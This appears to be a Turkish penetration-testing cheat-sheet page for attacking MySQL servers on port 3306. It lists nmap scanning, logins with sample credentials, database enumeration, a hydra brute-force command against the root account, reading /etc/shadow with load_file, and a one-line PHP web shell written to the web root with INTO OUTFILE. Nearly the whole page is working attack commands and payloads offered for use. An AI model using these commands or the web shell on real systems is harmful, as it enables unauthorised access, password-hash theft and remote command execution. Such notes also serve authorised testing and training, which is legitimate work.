MySQL - 3306

Scan

nmap 192.168.1.2 -sV -sC -p3306 --script mysql*

Bağlantı

# Connect
mysql -u fiona -p987654321 -h 10.129.232.182 --skip-ssl
# SSL Disable
mysql -h 192.168.1.2 -u root -pPassword123 --ssl-verify-server-cert=FALSE

# Veritabanları
show databases;
# Veritabanı seçer
use users;
# Tabloları listeler
show tables;
# Tablodaki verileri listeler
select * from users;

Brute Force

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.1.3 mysql

Sunucudaki dosyayı okur.

mysql -h 192.168.1.3 -u root
select load_file("/etc/shadow");

Dosyaya Yazma

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

PreviousGrafana - 3000 NextRDP - 3389

Last updated 1 year ago